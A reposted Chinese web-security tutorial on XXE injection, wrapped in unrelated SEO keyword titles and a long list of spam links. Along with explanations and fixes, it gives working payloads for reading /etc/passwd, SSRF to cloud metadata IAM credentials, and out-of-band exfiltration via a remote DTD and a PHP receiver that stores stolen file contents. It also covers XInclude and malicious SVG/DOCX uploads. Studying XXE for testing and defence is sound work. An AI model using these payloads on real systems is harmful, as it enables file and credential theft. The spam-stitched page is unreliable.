当前位置: 首页 > wzjs >正文

狼雨seo网站排名查询建一个门户网站多少钱

狼雨seo网站排名查询,建一个门户网站多少钱,网页美工设计期末作业成品,中国四川机械加工网知识点: 1、WEB攻防-XML&XXE-注入原理&分类&修复 2、WEB攻防-XML&XXE-文件读取&SSRF&实体引用 3、WEB攻防-XML&XXE-无回显&升级拓展&挖掘思路 一、演示案例-WEB攻防-XML&XXE-注入原理&分类&安全影响 详细点 XML被…

知识点:
1、WEB攻防-XML&XXE-注入原理&分类&修复
2、WEB攻防-XML&XXE-文件读取&SSRF&实体引用
3、WEB攻防-XML&XXE-无回显&升级拓展&挖掘思路

在这里插入图片描述
在这里插入图片描述

一、演示案例-WEB攻防-XML&XXE-注入原理&分类&安全影响

详细点

XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。等同于JSON传输。

XMLHTML 的主要差异:
XML 被设计为传输和存储数据,其焦点是数据的内容。
HTML 被设计用来显示数据,其焦点是数据的外观。
HTML 旨在显示信息 ,而XML旨在传输存储信息。

XXE漏洞XML External Entity Injection,即xml外部实体注入漏洞:XXE漏洞发生在应用程序解析XML输入时,没禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取(最主要的影响)、命令执行、内网扫描、攻击内网等危害。

XXE黑盒发现

两类:
数据包的测试
功能点的测试

1、获取得到Content-Type或数据类型为xml时,尝试xml语言payload进行测试
在这里插入图片描述
在这里插入图片描述

2、不管获取的Content-Type类型或数据传输类型,均可尝试修改后提交测试xxe
在这里插入图片描述
在这里插入图片描述
3、XXE不仅在数据传输上可能存在漏洞,同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行(百度docx xxe即可)
参考地址:https://blog.csdn.net/weixin_57567655/article/details/124588490
在这里插入图片描述

XXE白盒发现

1、可通过应用功能追踪代码定位审计
2、可通过脚本特定函数搜索定位审计
3、可通过伪协议玩法绕过相关修复等

XXE修复防御方案

方案1-禁用外部实体
PHP:
libxml_disable_entity_loader(true);JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);Python:
from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))方案2-过滤用户提交的XML数据
过滤关键词:<!DOCTYPE和<!ENTITY,或者SYSTEM和PUBLIC

二、演示案例-WEB攻防-XML&XXE-有回显利用-文件读取&SSRF&外部实体

1、文件读取

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

在这里插入图片描述
在这里插入图片描述

2、SSRF&配合元数据

条件:存在XXE注入的云服务器应用
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>
&xxe;
</productId><storeId>1</storeId></stockCheck>

在这里插入图片描述
在这里插入图片描述

3、文件读取-外部引用实体dtd

file.dtd
<!ENTITY send SYSTEM "file:///c:/c.txt">

在这里插入图片描述
在这里插入图片描述

<?xml version="1.0" ?>
<!DOCTYPE test [<!ENTITY % file SYSTEM "http://xiaodi8.com/file.dtd">
%file;
]>
<user><username>&send;</username><password>xiaodi</password></user>

在这里插入图片描述

三、演示案例-WEB攻防-XML&XXE-无回显利用&文件拓展解析等

无回显利用

在这里插入图片描述

1、DNSLOG-带外测试

<?xml version="1.0" ?>
<!DOCTYPE test [<!ENTITY % file SYSTEM "http://xiaodi8.dnslog.cn">
%file;
]>
<user><username>xiaodi</username><password>xiaodi</password></user>

在这里插入图片描述
在这里插入图片描述

2、文件读取-外部引用实体dtd配合带外

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///c:/c.txt">
<!ENTITY % remote SYSTEM "http://www.xiaodi8.com/test.dtd">
%remote;
%all;
]>
<user><username>&send;</username><password>xiaodi</password></user>test.dtd:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://www.xiaodi8.com/get.php?file=%file;'>">get.php:
<?php
$data=$_GET['file'];
$myfile = fopen("file.txt", "w+");
fwrite($myfile, $data);
fclose($myfile);
?>执行逻辑顺序:test.dtd->all->send->get.php?file=%file->file:///c:/c.txt
http://www.xiaodi8.com/get.php?file=读取的内网数据

在这里插入图片描述
在这里插入图片描述

3、文件读取-外部引用实体dtd配合错误解析

test.dtd内容:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;//这是一个报错的payload,利用目标服务器报错解析来读取文件内容。

BURP靶场

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0ab2006f03dce8a4803dfde101f3007d.exploit-server.net/exploit"> %xxe;]>

在这里插入图片描述
在这里插入图片描述

文件拓展解析

1、xinclude利用

XInclude 是一种让你能把多个独立的 XML 文件像拼积木一样“动态组合”成一个大 XML 文档的标准方法。它通过在主文件里放置特殊的“包含指令”(<xi:include>),告诉 XML 处理器在需要的时候去自动加载并插入指定文件的内容。这样做的主要好处是让大型 XML 文档更容易编写、维护和复用。
在这里插入图片描述
一些应用程序接收客户端提交的数据,在服务器端将其嵌入到XML文档中,然后解析该文档,所以利用xinclude嵌套进去执行。

BURP靶场

<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

在这里插入图片描述
在这里插入图片描述

2、文件上传-SVG图像解析(docx等)

一些应用程序接收解析文件,可以使用基于XML的格式的例子有DOCX这样的办公文档格式和SVG这样的图像格式进行测试。

SVG图片

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
SRC文章:https://mp.weixin.qq.com/s/5iPoqsWpYfQmr0ExcJYRwg

DOCX文档
参考文章:https://blog.csdn.net/weixin_57567655/article/details/124588490
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

3、功能点挖掘总结

基于XML的Web服务: SOAP、REST和RPC API这些接收和处理XML格式
导入/导出功能: 任何以 XML 格式传输数据的进出口
RSS/Atom 订阅处理器: 订阅功能也可能隐藏着 XXE 漏洞。
文档查看器/转换器: 处理DOCX、XLSX等XML 格式文档的功能
文件上传处理 XML: 比如SVG图像处理器,上传图片也可能中招!

文章转载自:

http://0mKLldRk.kwrzg.cn
http://ClOXGiJ8.kwrzg.cn
http://GFMWKS8S.kwrzg.cn
http://JpKnkNyS.kwrzg.cn
http://fjfKN9lu.kwrzg.cn
http://Jg8LCVJ2.kwrzg.cn
http://S1FsmMBK.kwrzg.cn
http://fY5LKhqK.kwrzg.cn
http://VRvGb7r7.kwrzg.cn
http://j7dK7YSu.kwrzg.cn
http://OQSL8Oeh.kwrzg.cn
http://MXtIJAw7.kwrzg.cn
http://trYDNOiU.kwrzg.cn
http://EWw596QO.kwrzg.cn
http://S5nrpwr8.kwrzg.cn
http://qxcS4uvx.kwrzg.cn
http://EerwSncR.kwrzg.cn
http://FLRgfiEi.kwrzg.cn
http://XHIBEctD.kwrzg.cn
http://b1wzTeAf.kwrzg.cn
http://01OK4qmn.kwrzg.cn
http://V3DVDI42.kwrzg.cn
http://FxPw5Ucu.kwrzg.cn
http://PmGd3tws.kwrzg.cn
http://gxQHsHEB.kwrzg.cn
http://DIqOMNeV.kwrzg.cn
http://WOifZcuH.kwrzg.cn
http://vmO6Ai7T.kwrzg.cn
http://nihfPDBk.kwrzg.cn
http://jqyo5sgy.kwrzg.cn
http://www.dtcms.com/wzjs/628730.html

相关文章:

  • 刚开始的网站开发公司佛山市建设工程有限公司
  • 高科技公司网站模板可以上传软件的网站
  • 网站建设意思ps做网站的效果图
  • 什么网站做h5沈阳seo关键词排名
  • 电商网站商品页的优化目标是什么查看网站备案号
  • 个体户能做网站备案吗西安网站建设网络公司
  • 网站媒体作风建设年工作总结黑彩网站怎么做
  • 网站推广见效快的方法做网站广告联盟赚钱
  • 刘涛做的婴儿玩具网站做网站建设需要做哪些工作
  • 做国外搞笑网站服务哪家好中医小程序定制
  • 东莞微信网站商城建设阿里云 拦截网站
  • 祥云平台英文网站wordpress显示评论者地理位置 浏览器
  • 小程序建站模板江西建设厅网站官网
  • 网站域名品牌怎么写淘宝网首页登录网页版
  • 免费行情软件网站直播广州越秀区天气预报
  • 企业网站建设晋升没有服务器建网站
  • 网站刚做好怎么做优化海安县城乡建设局网站
  • 怎么做网站底部文件上海网页设计
  • 物流平台系统性价比高seo的排名优化
  • 东明网站建设html网站首页
  • 订票网站开发公司温州做外贸网站
  • 新农宝网站建设方案公司网页设计公司招聘
  • 阿里巴巴1688网站做店铺wordpress页脚内容居中
  • 网站推广的途径网络广告的计费方式
  • 网站建设需要在网络上如何实现百度竞价排名机制
  • 网站服务器速度对seo有什么影响?山东省工程建设招标信息网站
  • 做医疗竞价网站一键生成房屋设计图
  • 诸城网站设计汽车之家如何做团购网站
  • dede响应式网站模板相册管理网站模板下载
  • 网站定制开发是什么郑州网站建设冫汉狮网络